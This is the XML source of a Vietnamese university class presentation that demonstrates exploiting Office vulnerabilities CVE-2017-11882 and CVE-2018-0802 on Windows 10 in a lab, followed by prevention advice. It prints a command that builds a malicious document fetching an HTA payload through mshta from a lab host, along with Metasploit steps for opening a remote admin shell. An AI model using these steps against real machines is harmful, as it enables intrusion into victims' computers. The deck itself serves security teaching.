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CB40-1FDF-4581-B784-FBA7B2D4D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D035D5-44DB-4725-8023-5C0D85117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C6DBC5-954A-4DA7-8737-BC317C9854CF}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74DFEB37-02DF-4844-AED6-00196E5DB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66334-1AE5-4E14-AE66-109BBF59C380}"/>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164841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E777-8CBF-4EA1-91FB-1241D3873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18AFD4-C164-4ECA-B1E7-0BCC95F5F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94A9A-D6AB-4709-97BD-A5F889E4E009}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9976A42-812F-4671-8553-299C31D0A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52E10-95BA-4704-B019-F63E86667EE0}"/>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426696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BCA8D-5E34-4EBD-98B7-47DA1C73AA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9FCCF2-26D1-4DF2-8E5C-9DCECB5DFB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37291-D7DF-4BFD-8E04-721CA4DA412A}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BCF8B8B-D873-4442-88C6-EDF821E19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3E491-A2F2-445A-B228-CD6214409AE6}"/>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346324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99A4-9EDA-45FB-BB2B-AA7E15EE6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CFF6F-8C1D-441E-9930-55DA10DC43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6DBF-6CDA-4430-8113-4FE80BDD113C}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A5897C9-27F1-475D-81BB-884A706CF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BE090-44CC-4629-B89C-190F9A7CF11C}"/>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187962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5C00-0FC7-4541-AB20-9B6299480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DEF64E-016B-4DF7-B9FC-1EF16E9A5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D2F911-BA53-4024-B5C7-DD615B07E5E8}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F92B947E-E7A5-4B83-914D-433EEF73C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27EBA-A78F-421F-9266-3190FADD423A}"/>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306204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7141-5567-481A-B662-3AABD8802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6850A-B3EA-4CA1-BA69-A52280AC2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159B41-3E87-4F16-8393-14AA173BCF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38169B-7E5F-43F8-938C-61A4296B8F87}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{864496D1-8B69-4DE3-99DD-A9103C452C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8B3F4-4FC3-4DF5-ACBD-662095F7728C}"/>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405021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D947-6079-4DEE-92B7-64FAE26711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8DE03-BC40-43CB-A080-0B4D4397C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9A624E-A6B8-4EDE-BE77-4479C67165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17CA14-F345-42D7-B929-EA586EE0F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B9A6C-CCF4-4BFB-8F5C-92EA3D747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F7E7E4-927C-4F8B-8638-0BD0E236312D}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B49EEA2B-21EA-49F1-B099-CB3CF0C003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6C309-CA8D-4661-BA72-E3B02A8FD7D8}"/>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920195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CD86-2AF9-465C-BDD3-2BB095A120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02C7AB-4790-4135-9C63-BA878268C94C}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C17AB7C5-49AC-428B-9917-65399A3B2B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83DD7-32B8-478D-B73A-FBD8C39E35C2}"/>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366045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DDEB6B-62D6-4444-9D48-A41994D2716C}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{669AC470-58E3-4551-9050-AFABDB48EB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ABE070-EC34-4D3B-8549-9EC1C929B6A3}"/>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96855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6A68-6AC8-4411-B81D-E51573E70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8C73E6-E906-4F89-AD17-1D1E7BA9B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E70A4B-34BF-4A9E-BD65-F55B7A5A1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7BDED-2626-4AE9-A584-0546FF9F4A1E}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F8557EA-81A3-42E5-9AFA-3C87C4E33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BFDF4-BD2E-4F88-8A80-9B62DDB47785}"/>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193074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8E07-1C1D-40D3-AED6-34FEB6F41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EDAD68-395D-45E4-8AAE-3922F9F95C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6EC55-52D7-4F21-A014-FED35E03E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AE352-BA8B-4104-8B80-4B6BC1EA0209}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A2460DD-B5CC-434F-BBD7-945460A90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E0D782-5A77-416B-9173-8EBA4516486C}"/>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189523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24EA83-8A41-406C-A689-7A61B6FF8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0BFB9F-C778-4323-AF40-54EBAAE18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68339-6D8B-4883-B4E7-8A410BE39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26747-928F-433B-B7B2-888F89432100}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/15/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0EF60F9-EF4E-468F-A41A-1B1D383F56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DDBA98-92CD-4418-A1DE-31045E3AC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D2F56-2A61-43FE-8812-C4C24EC9D49A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="645739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6BFAD5-A803-418D-8483-6BE2EF241369}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3112655" y="406400"/>
            <a:ext cx="5966691"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000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>AN TOÀN BẢO MẬT THÔNG TIN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9779AB09-9DAC-445A-9DFC-47858B91DB5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2355273" y="1797784"/>
            <a:ext cx="7481453"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000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>KHAI THÁC LỔ HỔNG TRÊN WINDOWS 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD7B94DA-E7B8-4FAE-9562-CC1139325EE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-794327" y="4765119"/>
            <a:ext cx="5966691" cy="20928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600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>GVHD:   Lê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Minh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Trí</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nhóm 2: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Anh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hào</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="ct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Minh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hùng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="ct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Minh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Quân</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ct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Đạt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76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162147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Bây giờ tôi sẽ chạy lệnh để tạo ra file tấn công. (Lưu ý phải tắt Windows Security): “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>python RTF_11882_0802.py -c "mshta http://169.254.237.110:8080/xxxxx.hta" -o tailieumat.doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>” với xxxxx.hta là dãy chữ lấy từ bên màng hình Terminal của Metasploit framework.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78A5831D-9796-4A9B-89C4-8ECFBEB3B095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1015940" y="2827972"/>
            <a:ext cx="9775387" cy="3628246"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152324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10905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Bây giờ tôi sẽ dựng host đơn giải để public file lên. Trên thực tế, nạn nhân có thể nhận file tấn công bằng các đường khác nhau như web hay mail: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>python -m SimpleHTTPServer 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D360048B-C576-4A8E-9D18-0D132532DF7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="854334" y="2371991"/>
            <a:ext cx="10856135" cy="1996809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250543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16676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just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>A2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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Sau khi máy nạn nhân tải về và mở lên, tôi sẽ nhập lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>sessons -i 1</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endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6775CF93-2136-4B84-89A6-241DEF9B3397}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="604953" y="2396890"/>
            <a:ext cx="11170171" cy="1140637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{218020F8-88F0-4FD0-A53E-7879021137A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="604953" y="3537527"/>
            <a:ext cx="11313093" cy="21523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Bây giờ máy nạn nhân đã bị tấn công tôi có thể xem được thông tin máy tính nạn nhân: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>sysinfo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="34290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Để có thể chạy được cmd tôi gõ lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>shell</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Bây giờ tôi đã có quyền </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" b="1" i="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t> hoặc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" b="1" i="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t> của máy nạn nhân</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:effectLst/>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298114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Kết</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quả</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21523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Tôi đã tấn công thành công máy Windows 10 của nạn nhân và tôi đã tạo một thư mục trên màng hình desktop của nạn nhân</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Ngoài ra tôi có toàn quyền truy cập mà không bị giới hạn vì tôi đang ở quyền cao nhất là Admin hoặc Root.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:effectLst/>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395724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Các</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phòng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chống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37451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Update hệ điều hành và các phần mềm thường xuyên</a:t>
            </a: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Các phần mềm mới sẽ ngăn chặn các lỗ hổng </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Không kết nối vào các nguồn Internet công cộng không được bảo mật</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Tránh hoặc hạn chế nhấp vào các đường link lạ hoặc tải xuống các tệp không rõ nguồn gốc</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Không tắt tường lữa máy tính</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Cài đặc và cập nhật các phần mềm diệt virus</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Mua bản quyền các phần mềm, không Cr@ck phần mềm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:effectLst/>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3938335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79AB09-9DAC-445A-9DFC-47858B91DB5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2355273" y="2647530"/>
            <a:ext cx="7481453"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000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XIN CẢM ƠN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217453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2DAC1B-0AAB-427A-92C4-CC918BB58C1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191491" y="1691696"/>
            <a:ext cx="809105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0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tổng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quan</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về</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đề</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tài</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2CCB98-0F58-4C25-9FA5-952F5E18564F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191491" y="3660290"/>
            <a:ext cx="809105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0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Quá</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trình</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và</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kết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quả</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thực</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nghiệm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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6323FFB-F0B8-43C1-BDF5-EE70B3B19ED9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191491" y="2603544"/>
            <a:ext cx="809105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0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Cơ</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sở</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lý</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thuyết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33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Tổng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quan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về</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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>đề</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tài</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50127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Aft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Tổng quan về đề tài</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Khai thác lỗ hổng CVE-2017-11882 và CVE-2018-0802 trên Office 2010 và Windows 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:effectLst/>
